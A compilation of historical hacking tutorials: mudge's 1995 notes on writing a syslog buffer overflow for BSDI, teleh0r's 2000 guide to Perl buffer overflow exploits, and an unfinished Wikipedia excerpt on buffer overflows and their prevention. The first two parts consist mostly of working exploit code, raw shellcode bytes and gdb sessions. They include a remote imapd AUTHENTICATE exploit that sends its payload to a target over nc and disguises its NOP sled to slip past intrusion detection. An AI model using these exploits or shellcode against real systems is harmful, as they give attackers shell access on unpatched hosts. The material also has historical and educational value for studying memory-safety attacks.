(gdb) disassemble execve
Dump of assembler code for function execve:
to 0x10c8:
0x10b8 : leal 0x3b,%eax
0x10be : lcall 0x7,0x0
0x10c5 : jb 0x10b0
0x10c7 : ret
End of assembler dump.


This is the assembly behind what our execute program does to run /bin/sh. We use execve() as it is a system call and this is what we are going to have our program execute (ie let the kernel service run it as opposed to having to write it from scratch).

0x1083 contains the /bin/sh string and is the last thing pushed onto the stack before the call to execve.

(gdb) x/10bc 0x1083
0x1083 : 47 '/' 98 'b' 105 'i' 110 'n' 47 '/' 115 's'
104 'h' 0 '\000'


(0x1080 contains the arguments...which I haven't been able to really clean up).

We will replace this address with the one where our string lives [when we decide where that will be].

Here's the skeleton we will use from the execve disassembly:

[main]
0x108d : movl %esp,%ebp

0x108e : movl $0x1083,0xfffffff8(%ebp)
0x1095 : movl $0x0,0xfffffffc(%ebp)
0x109c : pushl $0x0
0x109e : leal 0xfffffff8(%ebp),%eax
0x10a1 : pushl %eax
0x10a2 : pushl $0x1080

[execve]
0x10b8 : leal 0x3b,%eax
0x10be : lcall 0x7,0x0


All you need to do from here is to build up a bit of an environment for the program. Some of this stuff isn't necessary but I have it in still as I haven't fine tuned this yet.

I clean up eax. I don't remember why I do this and it shouldn't really be necessary. Hell, better quit hitting the sauce. I'll figure out if it is after I tune this up a bit.

xorl %eax,%eax


We will encapsulate the actual program with a jmp to somewhere and a call right back to the instruction after the jmp. This pushes ecx and esi onto the stack.

jmp 0x???? # this will jump to the call...
popl %esi
popl %ecx


The call back will be something like:

call 0x???? # this will point to the instruction after the jmp (ie
# popl %esi)

All put together it looks like this now:

----------------------------------------------------------------------
movl %esp,%ebp
xorl %eax,%eax
jmp 0x???? # we don't know where yet...
# -------------[main]
movl $0x????,0xfffffff8(%ebp) # we don't know what the address will
# be yet.
movl $0x0,0xfffffffc(%ebp)
pushl $0x0
leal 0xfffffff8(%ebp),%eax
pushl %eax
pushl $0x???? # we don't know what the address will
# be yet.
# ------------[execve]
leal 0x3b,%eax
lcall 0x7,0x0

call 0x???? # we don't know where yet...

----------------------------------------------------------------------


There are only a couple of more things that we need to add before we fill in the addresses to a couple of the instructions.

Since we aren't actually calling execve with a 'call' anymore here, we need to push the value in ecx onto the stack to simulate it.

# ------------[execve]
pushl %ecx
leal 0x3b,%eax
lcall 0x7,0x0


The only other thing is to not pass in the arguments to /bin/sh. We do this by changing the ' leal 0xfffffff8(%ebp),%eax' to ' leal 0xfffffffc(%ebp),%eax' [remember 0x0 was moved there].

So the whole thing looks like this (without knowing the addresses for the '/bin/sh\0' string):

movl %esp,%ebp
xorl %eax,%eax # we added this
jmp 0x???? # we added this
popl %esi # we added this
popl %ecx # we added this
movl $0x????,0xfffffff5(%ebp)
movl $0x0,0xfffffffc(%ebp)
pushl $0x0
leal 0xfffffffc(%ebp),%eax # we changed this
pushl %eax
pushl $0x????
leal 0x3b,%eax
pushl %ecx # we added this
lcall 0x7,0x0
call 0x???? # we added this


To figure out the bytes to load up our buffer with for the parts that were already there, run gdb on the execute program.

bash$ gdb execute
(gdb) disassemble main
Dump of assembler code for function main:
to 0x10bc:
0x108c : pushl %ebp
0x108d : movl %esp,%ebp
0x108f : subl $0x8,%esp
0x1092 : movl $0x1080,0xfffffff8(%ebp)
0x1099 : movl $0x0,0xfffffffc(%ebp)
0x10a0 : pushl $0x0
0x10a2 : leal 0xfffffff8(%ebp),%eax
0x10a5 : pushl %eax
0x10a6 : pushl $0x1083
0x10ab : call 0x10bc
0x10b0 : leave
0x10b1 : ret
0x10b2 : addb %al,(%eax)
0x10b4 : jmp 0x1144
0x10b9 : addb %al,(%eax)
0x10bb : addb %cl,0x3b05(%ebp)
End of assembler dump.

[get out your scratch paper for this one... ]

0x108d : movl %esp,%ebp
This goes from 0x108d to 0x108e; 0x108f starts the next instruction, so the instruction is two bytes long.
Thus we can see the machine code with gdb like this:

(gdb) x/2bx 0x108d
0x108d : 0x89 0xe5


Now we know that buffer[2028]=0x89 and buffer[2029]=0xe5. Do this for all of the instructions that we are pulling out of the execute program. You can figure out the basic structure for the call command by looking at the one in execute that calls execve. Of course you will eventually need to put in the proper address.

When I work this out I break down the whole program so I can see what's going on. Something like the following:

0x108c : pushl %ebp
0x108d : movl %esp,%ebp
0x108f : subl $0x8,%esp

(gdb) x/bx 0x108c
0x108c : 0x55
(gdb) x/bx 0x108d
0x108d : 0x89
(gdb) x/bx 0x108e
0x108e : 0xe5
(gdb) x/bx 0x108f
0x108f : 0x83

so we see the following from this:

0x55 pushl %ebp

0x89 movl %esp,%ebp
0xe5

0x83 subl $0x8,%esp

etc. etc. etc.


For commands whose opcodes you don't know, you can find them out for the particular chip you are on by writing little scratch programs.

----pop.c-------
void main() {

__asm__("popl %esi\n");

}
---end pop.c----

bash$ gcc -g pop.c -o pop
bash$ gdb pop
(gdb) disassemble main
Dump of assembler code for function main:
to 0x1088:
0x1080 : pushl %ebp
0x1081 : movl %esp,%ebp
0x1083 : popl %esi
0x1084 : leave
0x1085 : ret
0x1086 : addb %al,(%eax)
End of assembler dump.
(gdb) x/bx 0x1083
0x1083 : 0x5e


So, 0x5e is popl %esi. You get the idea. After you have gotten this far, build the string up (put in bogus addresses for the ones you don't know in the jmp's and call's, just so long as we have the right amount of space being taken up by the jmp and call instructions; likewise for the movl's where we will need to know the memory location of 'sh\0/bin/sh\0').

After you have built up the string, tack on the chars for sh\0/bin/sh\0.

Compile the program and load it into gdb. Before you run it in gdb, set a breakpoint for the syslog call.

(gdb) break syslog
Breakpoint 1 at 0x1463
(gdb) run
Starting program: /usr2/home/syslog/buf

Breakpoint 1, 0x1463 in syslog (0x00000003, 0x0000bf50, 0x0000082c,
0xefbfdeac)
(gdb) disassemble 0xc73c 0xc77f
(we know it will start at 0xc73c since that's right after the
eip overflow... 0xc77f is just an educated guess as to where
it will end)

(gdb) disassemble 0xc73c 0xc77f
Dump of assembler code from 0xc73c to 0xc77f:
0xc73c : movl %esp,%ebp
0xc73e : xorl %eax,%eax
0xc740 : jmp 0xc76b
0xc742 : popl %esi
0xc743 : popl %ecx
0xc744 : movl $0xc770,0xfffffff5(%ebp)
0xc74b : movl $0x0,0xfffffffc(%ebp)
0xc752 : pushl $0x0
0xc754 : leal 0xfffffffc(%ebp),%eax
0xc757 : pushl %eax
0xc758 : pushl $0xc773
0xc75d : leal 0x3b,%eax
0xc763 : pushl %ecx
0xc764 : lcall 0x7,0x0
0xc76b : call 0xc742
0xc770 : jae 0xc7da
0xc772 : addb %ch,(%edi)
0xc774 : boundl 0x6e(%ecx),%ebp
0xc777 : das
0xc778 : jae 0xc7e2
0xc77a : addb %al,(%eax)
0xc77c : addb %al,(%eax)
0xc77e : addb %al,(%eax)
End of assembler dump.


Look for the last instruction in your code. In this case it was the 'call' to right after the 'jmp' near the beginning. Our data should be right after it and indeed we see that it is.

(gdb) x/13bc 0xc770
0xc770 : 115 's' 104 'h' 0 '\000' 47 '/'
98 'b' 105 'i' 110 'n' 47 '/'
0xc778 : 115 's' 104 'h' 0 '\000' 0 '\000' 0 '\000'


Now go back into your code and put the appropriate addresses in the movl and pushl. At this point you should also be able to put in the appropriate operands for the jmp and call. Congrats... you are done. Here's what the output will look like when you run this on a system with the unpatched libc/syslog bug.

bash$ buf
$ exit (do whatever here... you spawned a shell!!!!!! yay!)
bash$


Here's my original program with lots of comments:

/*****************************************************************/
/* For BSDI running on Intel architecture -mudge, 10/19/95 */
/* by following the above document you should be able to write */
/* buffer overflows for other OS's on other architectures now */
/* mudge@l0pht.com */
/* */
/* note: I haven't cleaned this up yet... it could be much nicer */
/*****************************************************************/

#include <syslog.h>

char buffer[4028];

void main () {

int i;

for(i=0; i<2024; i++)
buffer[i]=0x90;


/* should set eip to 0xc73c */

buffer[2024]=0x3c;
buffer[2025]=0xc7;
buffer[2026]=0x00;
buffer[2027]=0x00;

i=2028;

/* begin actual program */


buffer[i++]=0x89; /* movl %esp, %ebp */
buffer[i++]=0xe5;

buffer[i++]=0x33; /* xorl %eax,%eax */
buffer[i++]=0xc0;

buffer[i++]=0xeb; /* jmp ahead */
buffer[i++]=0x29;

buffer[i++]=0x5e; /* popl %esi */

buffer[i++]=0x59; /* popl %ecx */

buffer[i++]=0xc7; /* movl $0xc770,0xfffffff5(%ebp) */
buffer[i++]=0x45;
buffer[i++]=0xf5;
buffer[i++]=0x70;
buffer[i++]=0xc7;
buffer[i++]=0x00;
buffer[i++]=0x00;

buffer[i++]=0xc7; /* movl $0x0,0xfffffffc(%ebp) */
buffer[i++]=0x45;
buffer[i++]=0xfc;
buffer[i++]=0x00;
buffer[i++]=0x00;
buffer[i++]=0x00;
buffer[i++]=0x00;

buffer[i++]=0x6a; /* pushl $0x0 */
buffer[i++]=0x00;

#ifdef z_out
buffer[i++]=0x8d; /* leal 0xfffffff8(%ebp),%eax */
buffer[i++]=0x45;
buffer[i++]=0xf8;
#endif

/* the above is what the disassembly of execute does... but we only
want to push /bin/sh to be executed... it looks like this leal
puts into eax the address where the arguments are going to be
passed. By pointing to 0xfffffffc(%ebp) we point to a null
and don't care about the args... could probably have just loaded up
the first section movl $0x0,0xfffffff8(%ebp) with a null and
left this part the way it wants to be */

buffer[i++]=0x8d; /* leal 0xfffffffc(%ebp),%eax */
buffer[i++]=0x45;
buffer[i++]=0xfc;


buffer[i++]=0x50; /* pushl %eax */

buffer[i++]=0x68; /* pushl $0xc773 */
buffer[i++]=0x73;
buffer[i++]=0xc7;
buffer[i++]=0x00;
buffer[i++]=0x00;

buffer[i++]=0x8d; /* leal 0x3b,%eax */
buffer[i++]=0x05;
buffer[i++]=0x3b;
buffer[i++]=0x00;
buffer[i++]=0x00;
buffer[i++]=0x00;

buffer[i++]=0x51; /* pushl %ecx */

buffer[i++]=0x9a; /* lcall 0x7,0x0 */
buffer[i++]=0x00;
buffer[i++]=0x00;
buffer[i++]=0x00;
buffer[i++]=0x00;
buffer[i++]=0x07;
buffer[i++]=0x00;

buffer[i++]=0xe8; /* call back to popl %esi */
buffer[i++]=0xd2;
buffer[i++]=0xff;
buffer[i++]=0xff;
buffer[i++]=0xff;

buffer[i++]='s';
buffer[i++]='h';
buffer[i++]=0x00;
buffer[i++]='/';
buffer[i++]='b';
buffer[i++]='i';
buffer[i++]='n';
buffer[i++]='/';
buffer[i++]='s';
buffer[i++]='h';
buffer[i++]=0x00;
buffer[i++]=0x00;

syslog(LOG_ERR, buffer);
}



Copyright 1995, 1996 LHI Technologies, All Rights Reserved


HOW TO WRITE BUFFER OVERFLOWS
Copyright © by Mudge October 20, 1995

This is really rough, and some of it is not needed. I wrote this as a reminder note to myself as I really didn't want to look at any more AT&T assembly again for a while and was afraid I would forget what I had done. If you are an old assembly guru then you might scoff at some of this… oh well, it works and that's a hack in itself. — mudge@l0pht.com




Writing Buffer Overflow Exploits with Perl


-- Writing Buffer Overflow Exploits with Perl - anno 2000 --
- http://teleh0r.cjb.net/
==============================================================



Table of Contents:
~~~~~~~~~~~~~~~~~~~~

[ 1. Introduction
[ 2. Vulnerable Program Example
[ 3. Shellcode

[ 4. Designing the payload
[ 5. Explained Example Exploit
[ 6. Old Remote Imapd example exploit

[ 7. Links & Resources

-----------------------------------------------------------------------------

Introduction:
~~~~~~~~~~~~~~~

This paper is for those who want a practical approach to writing buffer overflow
exploits. As the title says, this text will teach you how to write these exploits
in Perl.

If you want a more in-depth guide, please take a look at the links provided at the
end of this paper, and read those instead.


Vulnerable Program Example:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Ok, time for an example. I have written a small program which is vulnerable to a
buffer overflow. strcpy() does not check the length of $KIDVULN before it starts
copying its contents into the buffer on the stack, thus making the program below
exploitable.

-----------------------------------------------------------------------------
++ vuln.c

#include <stdio.h>
int main() {
char kidbuffer[1024];

if (getenv("KIDVULN") == NULL) {
fprintf(stderr, "Grow up!\n");
exit(1);
}

/* Read the environment variable data into the buffer */
strcpy(kidbuffer, (char *)getenv("KIDVULN"));

printf("Environment variable KIDVULN is:\n\"%s\".\n\n", kidbuffer);
printf("Isn't life wonderful in kindergarten?\n");
return 0;
}

++ end
-----------------------------------------------------------------------------

[root@localhost teleh0r]# gcc -o vuln vuln.c
vuln.c: In function `main':
vuln.c:5: warning: comparison between pointer and integer
[root@localhost teleh0r]# export KIDVULN=`perl -e '{print "A"x"1028"}'`
[root@localhost teleh0r]# gdb vuln
GNU gdb 19991004
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux"...
(gdb) r
Starting program: /home/teleh0r/vuln
Environment variable KIDVULN is:
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA



Isn't life wonderful in kindergarten?

Program received signal SIGSEGV, Segmentation fault.
0x40032902 in __libc_start_main (main=Cannot access memory at address 0x41414149
) at ../sysdeps/generic/libc-start.c:61
61 ../sysdeps/generic/libc-start.c: No such file or directory.
(gdb)

-----------------------------------------------------------------------------

Ok, here we can see that our string wasn't long enough. The 1028 A's only reached
the saved frame pointer. Had the string been four bytes longer, the return address
would have been overwritten as well and the EIP register would have been
0x41414141. (41 == A in hex.)

-----------------------------------------------------------------------------

[root@localhost teleh0r]# export KIDVULN=`perl -e '{print "A"x"1032"}'`
[root@localhost teleh0r]# gdb vuln
GNU gdb 19991004
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux"...
(gdb) r
Starting program: /home/teleh0r/vuln
Environment variable KIDVULN is:
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA



Isn't life wonderful in kindergarten?

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb)

-----------------------------------------------------------------------------

Now we have completely overwritten the old return address. We can see that it
holds 4 A's. So what does this mean? Well, we can control where EIP points to,
and therefore we can get EIP to point to our payload. If this is successful, our
code will get executed on the stack.

(Some operating systems/patches may prevent code from being executed on the stack.)

-----------------------------------------------------------------------------

We now know the length we will use to completely overwrite the return address.
Since ESP points to the top of the stack, we can use the value of ESP when the
program died, and (if needed) add an offset to it.

This is how you get the stack pointer value to use in your exploit.

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) info reg esp
esp 0xbffff770 -1073744064
(gdb)

-----------------------------------------------------------------------------

Shellcode:
~~~~~~~~~~~~

If you want to learn how to write your own shellcode, please take a look at the
links provided at the end of this paper. If you are lazy, and since you code in
Perl, chances are high, you could use tools which will make the shellcode for you.
Hellkit and execve-shell are good examples of such programs (great tools).

(You will find these tools at: http://teso.scene.at/)

[root@localhost execve-shell]# ./shellxp /bin/sh
build exploit shellcode
-scut / teso.

constructing shellcode...

[ 39/2048] adding ( 7): /bin/sh
shellcode size: 47 bytes

/* 47 byte shellcode */
"\xeb\x1f\x5f\x89\xfc\x66\xf7\xd4\x31\xc0\x8a\x07"
"\x47\x57\xae\x75\xfd\x88\x67\xff\x48\x75\xf6\x5b"
"\x53\x50\x5a\x89\xe1\xb0\x0b\xcd\x80\xe8\xdc\xff"
"\xff\xff\x01\x2f\x62\x69\x6e\x2f\x73\x68\x01";

-----------------------------------------------------------------------------

Designing the payload:
~~~~~~~~~~~~~~~~~~~~~~~~

The payload will be stored in the $buffer scalar, with the data which will be
used for the exploitation. It will have the length needed to completely overwrite
the old return address. We will insert this code into the targeted program
(user-input) in order to change its flow.

The payload will in most cases look like this:

N = NOP (0x90) / S = Shellcode / R = ESP (+ offset).

Buffer: [ NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNSSSSSSSRRRRRRRRRRRRRR ]

There are reasons why we construct the buffer this way. First we have a lot of
NOPs, then the shellcode (which in this example will execute /bin/sh), and
finally the ESP + offset values.

The EIP register will get loaded with the value pointed to by ESP. So if ESP
points to anywhere inside the NOPs, the NOPs will do "no operations", and
continue to do nothing until the processor reaches the shellcode and then
executes it. (See the figure below)

_______________________________________________
<---- |[ NNNNNNNNNNNNNNNNNNNNNNNNNNN-SHELLCODE-RRRRRRR ]| <----
\_________________________/ ----> # ^
^ |
|________________________________|


If the buffer we were trying to overflow had been too small to add a decent
amount of NOP's, the shellcode and RET's, the below layout could have been
used when constructing the payload. (We could have added the NOP's and shellcode
into a shell-variable as well)

(R = Stack Pointer + Offset / S = Shellcode / N = x86 NOP)

/ ESP + offset / NOP's / Shellcode
Payload: [ RRRRRRRRRRRRRRRNNNNNNNNNNNNNNNNNNSSSSSS ]
| | ----------> #
----------


(Note: The buffer cannot contain any NULL bytes!)

-----------------------------------------------------------------------------

Explained Example Exploit:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~

#!/usr/bin/perl


$shellcode = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89".
"\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c".
"\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff".
"\xff\xff/bin/sh";


$len = 1024 + 8; # The length needed to own EIP.
$ret = 0xbffff770; # The stack pointer at crash time.
$nop = "\x90"; # x86 NOP
$offset = -1000; # Default offset to try.


if (@ARGV == 1) {
$offset = $ARGV[0];
}

for ($i = 0; $i < ($len - length($shellcode) - 100); $i++) {
$buffer .= $nop;
}

# [ Buffer: NNNNNNNNNNNNNN ]

# Add a lot of x86 NOP's to the buffer scalar. (885 NOP's)

$buffer .= $shellcode;

# [ Buffer: NNNNNNNNNNNNNNSSSSS ]

# Then we add the shellcode to the buffer. We made room for the shellcode
# above.

print("Address: 0x", sprintf('%lx',($ret + $offset)), "\n");

# Here we add the offset to the stack pointer value - convert it to hex,
# and then print it out.

$new_ret = pack('l', ($ret + $offset));

# pack is a function which will take a list of values and pack it into a
# binary structure, and then return that string containing the structure.
# So, pack the stack pointer / ESP + offset into a signed long - (4 bytes).

for ($i += length($shellcode); $i < $len; $i += 4) {
$buffer .= $new_ret;
}

# [ Buffer: NNNNNNNNNNNNNNNNSSSSSRRRRRR ]

# Here we add the length of the shellcode to the scalar $i, which after the
# first for loop had finished held the value "885" (bytes), then the for loop
# adds the $new_ret scalar until $buffer has the size of 1032 bytes.
#
# Could also have been written as this:
#
# until (length($buffer) == $len) {
# $buffer .= $new_ret;
#}

local($ENV{'KIDVULN'}) = $buffer; exec("/bin/vuln");

# Copy it into the shell variable KIDVULN, and execute vuln.

-----------------------------------------------------------------------------

#!/usr/bin/perl

## *** Successfully tested on IMAP4rev1 v10.190
## Written by: teleh0r@doglover.com / anno 2000
##
## This is nothing new - written just for fun.
## Vulnerable: imapd versions 9.0 > 10.223 / CA.

# Shellcode stolen from imapx.c / The Tekneeq Crew

$shellcode ="\xeb\x35\x5e\x80\x46\x01\x30\x80\x46\x02\x30\x80".
"\x46\x03\x30\x80\x46\x05\x30\x80\x46\x06\x30\x89".
"\xf0\x89\x46\x08\x31\xc0\x88\x46\x07\x89\x46\x0c".
"\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80".
"\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xc6\xff\xff\xff".
"\x2f\x32\x39\x3e\x2f\x43\x38";

$len = 1052; # Sufficient to overwrite the return value.
$nop = A; # Using A (0x41) 'as' NOP's to try to fool IDS.
$ret = 0xbffff30f; # Return Value / ESP / Stack Pointer.

if (@ARGV < 2) {
print("Usage: $0 \n");
exit(1);
}

($target, $offset) = @ARGV;

for ($i = 0; $i < ($len - length($shellcode) - 100); $i++) {
$buffer .= $nop;
}

$buffer .= $shellcode;
$new_ret = pack('l', ($ret + $offset));

$address = sprintf('%lx', ($ret + $offset));
print("Address: 0x$address / Offset: $offset / Length: $len\n\n");
sleep(1);

for ($i += length($shellcode); $i < $len; $i += 4) {
$buffer .= $new_ret;
}

$exploit_string = "* AUTHENTICATE {$len}\015\012$buffer\012";

system("(echo -e \"$exploit_string\" ; cat) | nc $target 143");

-----------------------------------------------------------------------------

Links & Resources:
~~~~~~~~~~~~~~~~~~~~

Smashing The Stack For Fun And Profit by Aleph One
http://phrack.infonexus.com/search.phtml?view&article=p49-14

Writing buffer overflow exploits - a tutorial for beginners.
http://mixter.warrior2k.com/exploit.txt / Written by Mixter.

TESO Security Group / http://teso.scene.at/




Buffer overflow
From Wikipedia, the free encyclopedia

In computer security and programming, a buffer overflow, or buffer overrun, is a programming error which may result in a memory access exception and program termination, or in the event of the user being malicious, a breach of system security.

A buffer overflow is an anomalous condition where a process attempts to store data beyond the boundaries of a fixed length buffer. The result is that the extra data overwrites adjacent memory locations. The overwritten data may include other buffers, variables and program flow data.

Buffer overflows may cause a process to crash or produce incorrect results. They can be triggered by inputs specifically designed to execute malicious code or to make the program operate in an unintended way. As such, buffer overflows cause many software vulnerabilities and form the basis of many exploits. Sufficient bounds checking by either the programmer or the compiler can prevent buffer overflows.

Technical description

A buffer overflow occurs when data written to a buffer, due to insufficient bounds checking, corrupts data values in memory addresses adjacent to the allocated buffer. Most commonly this occurs when copying strings of characters from one buffer to another.

Basic example

In the following example, a program has defined two data items which are adjacent in memory: an 8-byte-long string buffer, A, and a two-byte integer, B. Initially, A contains nothing but zero bytes, and B contains the number 3. Characters are one byte wide.
 A   A   A   A   A   A   A   A   B   B
 0   0   0   0   0   0   0   0   0   3

Now, the program attempts to store the character string "excessive" in the A buffer, followed by a zero byte to mark the end of the string. By not checking the length of the string, it overwrites the value of B:
 A   A   A   A   A   A   A   A   B   B
'e' 'x' 'c' 'e' 's' 's' 'i' 'v' 'e'  0

Although the programmer did not intend to change B at all, B's value has now been replaced by a number formed from part of the character string. In this example, on a big-endian system that uses ASCII, "e" followed by a zero byte would become the number 25856.

If B was the only other variable data item defined by the program, writing an even longer string that went past the end of B could cause an error such as a segmentation fault, terminating the process.

Buffer overflows on the stack

Besides changing values of unrelated variables, buffer overflows can often be used (exploited) by attackers to cause a running program to execute arbitrary supplied code. The techniques available to an attacker to seek control over a process depend on the memory region where the buffer resides. One such region is the stack, where data can be temporarily "pushed" onto the "top" of the stack and later "popped" to read the value back. Typically, when a function begins executing, temporary data items (local variables) are pushed, and these remain accessible only during the execution of that function. Buffers can also reside on the heap, so there are heap overflows as well as stack overflows.

In the following example, "X" is data that was on the stack when the program began executing; the program then called a function "Y", which required a small amount of storage of its own; and "Y" then called "Z", which required a large buffer:
Z Z Z Z Z Z Y X X X
: / / /

If the function Z caused a buffer overflow, it could overwrite data that belonged to function Y or to the main program:
Z Z Z Z Z Z Y X X X
. . . . . . . . / /

This is particularly serious because on most systems, the stack also holds the return address, that is, the location of the part of the program that was executing before the current function was called. When the function ends, the temporary storage is removed from the stack, and execution is transferred back to the return address. If, however, the return address has been overwritten by a buffer overflow, it will now point to some other location. In the case of an accidental buffer overflow as in the first example, this will almost certainly be an invalid location, not containing any program instructions, and the process will crash. However, a malicious attacker could tailor the return address to point to an arbitrary location such that it could compromise system security.

Example source code

The following is C source code exhibiting a common programming mistake. Once compiled, the program will generate a buffer overflow error if run with a command-line argument string that is too long, because this argument is used to fill a buffer without checking its length. [1]

/* overflow.c - demonstrates a buffer overflow */

#include <stdio.h>
#include <string.h>

int main(int argc, char *argv[])
{
    char buffer[10];
    if (argc < 2)
    {
        fprintf(stderr, "USAGE: %s string\n", argv[0]);
        return 1;
    }
    strcpy(buffer, argv[1]);   /* no length check on argv[1] */
    return 0;
}

Strings of 9 or fewer characters will not cause a buffer overflow. Strings of 10 or more characters will cause an overflow: this is always incorrect but may not always result in a program error or segmentation fault.

This program could be safely rewritten using strncpy as follows: [1]

/* better.c - demonstrates one method of fixing the problem */

#include <stdio.h>
#include <string.h>

int main(int argc, char *argv[])
{
    char buffer[10];
    if (argc < 2)
    {
        fprintf(stderr, "USAGE: %s string\n", argv[0]);
        return 1;
    }
    strncpy(buffer, argv[1], sizeof(buffer));   /* copies at most 10 bytes */
    buffer[sizeof(buffer) - 1] = '\0';          /* strncpy may not terminate */
    return 0;
}


Exploitation

The techniques to exploit a buffer overflow vulnerability vary per architecture, operating system and memory region. For example, exploitation on the heap (used for dynamically allocated variables) is very different from exploitation on the stack.

Stack-based exploitation

A technically inclined and malicious user may exploit stack-based buffer overflows to manipulate the program in one of several ways:

* By overwriting a local variable that is near the buffer in memory on the stack to change the behaviour of the program which may benefit the attacker.
* By overwriting the return address in a stack frame. Once the function returns, execution will resume at the return address as specified by the attacker, usually the address of a buffer filled with user input.

If the address of the user-supplied data is unknown, but the location is stored in a register, then the return address can be overwritten with the address of an opcode which will cause execution to jump to the user-supplied data. If the location is stored in a register R, then a jump to the location containing the opcode for a jump R, call R or similar instruction will cause execution of user-supplied data. The locations of suitable opcodes, or bytes in memory, can be found in DLLs or the executable itself. However, the address of the opcode typically cannot contain any null characters, and the locations of these opcodes can vary between applications and versions of the operating system. The Metasploit Project maintains one such database of suitable opcodes, though only those found in the Windows operating system are listed. [2]

Heap-based exploitation

Main article: Heap overflow

A buffer overflow occurring in the heap data area is referred to as a heap overflow and is exploitable in a different manner to that of stack-based overflows. Memory on the heap is dynamically allocated by the application at run-time and typically contains program data. Exploitation is performed by corrupting this data in specific ways to cause the application to overwrite internal structures such as linked list pointers. The canonical heap overflow technique overwrites dynamic memory allocation linkage (such as malloc meta data) and uses the resulting pointer exchange to overwrite a program function pointer.

The Microsoft JPEG GDI+ vulnerability is a recent example of the danger a heap overflow can represent to a computer user. [3]

Barriers to exploitation

Manipulation of the buffer which occurs before it is read or executed may lead to the failure of an exploitation attempt. These manipulations can mitigate the threat of exploitation, but may not make it impossible. Manipulations could include conversion to upper or lower case, removal of metacharacters and filtering out of non-alphanumeric strings. However, techniques exist to bypass these filters and manipulations: alphanumeric code, polymorphic code, self-modifying code and return-to-libc attacks. The same methods can be used to avoid detection by intrusion detection systems. In some cases, including where code is converted into Unicode, the disclosers have described the threat of the vulnerability as limited to denial of service when in fact the remote execution of arbitrary code is possible.

Protection against buffer overflows

Various techniques have been used to detect or prevent buffer overflows, with various tradeoffs. The most reliable way to avoid or prevent buffer overflows is to use automatic protection at the language level. This sort of protection, however, cannot be applied to legacy code, and often technical, business, or cultural constraints call for a vulnerable language. The following sections describe the choices and implementations available.

Choice of programming language

The choice of programming language can have a profound effect on the occurrence of buffer overflows. As of 2006, among the most popular languages are C and its derivative, C++, with an enormous body of software having been written in these languages. C and C++ provide no built-in protection against accessing or overwriting data in any part of memory through invalid pointers; more specifically, they do not check that data written to an array (the implementation of a buffer) is within the boundaries of that array. However, it is worth noting that the standard C++ libraries, the STL, provide many ways of safely buffering data, and similar facilities can also be created and used by C programmers. As with any other C or C++ feature, individual programmers are given the choice as to whether or not they wish to accept performance penalties in order to reap the potential benefits.

Variations on C such as Cyclone help to prevent more buffer overflows by, for example, attaching size information to arrays. The D programming language uses a variety of techniques to avoid most uses of pointers and user-specified bounds checking.

Many other programming languages provide runtime checking which might send a warning or raise an exception when C or C++ would overwrite data. Examples of such languages range broadly from Python to Ada, from Lisp to Modula-2, and from Smalltalk to OCaml. The Java and .NET bytecode environments also require bounds checking on all arrays. Nearly every interpreted language will protect against buffer overflows, signalling a well-defined error condition. Often where a language provides enough type information to do bounds checking an option is provided to enable or disable it. Static code analysis can remove many dynamic bound and type checks, but poor implementations and awkward cases can significantly decrease performance. Software engineers must carefully consider the tradeoffs of safety versus performance costs when deciding which language and compiler setting to use.

Use of safe libraries

